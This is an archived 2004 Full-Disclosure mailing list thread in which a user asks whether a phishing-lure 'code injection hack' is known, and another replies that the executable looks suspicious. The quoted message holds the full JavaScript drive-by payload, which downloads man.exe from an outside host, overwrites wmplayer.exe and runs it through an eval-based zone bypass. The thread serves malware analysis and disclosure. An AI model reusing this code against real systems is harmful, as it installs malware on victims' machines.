lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Old Hack?

if you look at the symbols from that exe, they are look dodge.

RegQueryValueExA
ShellExecuteA
4FtpPutFileA

also appears to have a base64 payload inside it. and i only used strings for
that its to hot to do any real work ..


----- Original Message ----- 
From: "axid3j1al axid3j1al" <axid3j1al@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Tuesday, February 03, 2004 4:40 PM
Subject: [Full-Disclosure] Old Hack?


> Has anyone see this little code injection hack.
>
> Is this old?
>
>
> Email has subject line "congranulations! you won $1169"
>
> with body
>
> http://sinaraevent.com/bbs/zipcode/6.htm
>
>
> and code
>
> <textarea id="code" style="display:none;">
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0);
> x.Send();
>
> var s = new ActiveXObject("ADODB.Stream");
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
>
> s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
> location.href = "mms://";
>
> </textarea>
>
> <script language="javascript">
>
> function preparecode(code) {
> result = '';
> lines = code.split(/\r\n/);
> for (i=0;i<lines.length;i++) {
>
> line = lines[i];
> line = line.replace(/^\s+/,"");
> line = line.replace(/\s+$/,"");
> line = line.replace(/'/g,"\\'");
> line = line.replace(/[\\]/g,"\\\\");
> line = line.replace(/[/]/g,"%2f");
>
> if (line != '') {
> result += line +'\\r\\n';
> }
> }
> return result;
> }
>
> function doit() {
> mycode = preparecode(document.all.code.value);
> myURL = "file:javascript:eval('" + mycode + "')";
> window.open(myURL,"_media")
> }
>
>
> window.open("error.jsp","_media");
>
> setTimeout("doit()", 5000);
>
>
> </script>
>
> braindwish has expired
>
> _________________________________________________________________
> Hot chart ringtones and polyphonics. Go to
> http://ninemsn.com.au/mobilemania/default.asp
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ